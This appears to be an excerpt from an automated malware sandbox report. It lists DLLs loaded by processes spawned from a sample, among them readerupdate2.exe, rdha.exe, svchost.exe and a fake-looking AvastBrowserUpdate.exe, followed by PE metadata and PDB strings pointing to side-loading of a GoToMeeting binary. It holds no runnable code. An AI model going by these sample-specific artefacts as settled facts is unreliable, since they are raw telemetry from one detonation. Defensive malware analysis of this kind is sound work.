Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: g2m.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10000160101\readerupdate2.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedZip_1cf60734\rdha.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netapi32.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sxs.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sxs.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: mswsock.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: secur32.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: sspicli.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: dpapi.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: taskschd.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: xmllite.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: taskschd.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: xmllite.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: taskschd.dll
Source: C:\Program Files\Windows Media Player\wmpnscfg.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: msi.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\Avt\AvastBrowserUpdate.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\dllhost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: drprov.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: ntlanman.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: davclnt.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: davhlpr.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: mswsock.dll

Source: C:\Users\user\Desktop\9ua5N7dcBZ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: 9ua5N7dcBZ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 9ua5N7dcBZ.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 9ua5N7dcBZ.exe

Static file information: File size 1682432 > 1048576

Source: 9ua5N7dcBZ.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x19a200

Source: 9ua5N7dcBZ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: g2m.pdb. source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000001.00000003.1322613072.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: rdha.exe, rdha.exe, 00000005.00000003.1459411737.00000000030A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459169276.0000000002810000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462490527.0000000005110000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462424813.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619658698.0000000002840000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1619900415.0000000003100000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: g2m.pdb source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, update.exe, 00000001.00000003.1322613072.000000000077E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: 9ua5N7dcBZ.exe, 00000000.00000002.1324362118.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 00000004.00000002.1441967825.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, readerupdate2.exe, 0000000E.00000002.1601865876.00000000030B1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: rdha.exe, 00000005.00000003.1459630648.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1459821006.0000000003240000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462888323.0000000005210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462640595.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620431709.00000000032A0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1620149862.0000000003080000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: rdha.exe, 00000005.00000003.1458189702.0000000003020000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458377462.0000000003210000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461869921.00000000051E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1461684888.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613195494.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1613603143.0000000003270000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: rdha.exe, 00000005.00000003.1458868669.00000000031C0000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 00000005.00000003.1458694145.0000000003020000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462129411.0000000004FF0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.1462265373.0000000005190000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614206122.0000000003080000.00000004.00000001.00020000.00000000.sdmp, rdha.exe, 0000000F.00000003.1614595814.0000000003220000.00000004.00000001.00020000.00000000.sdmp
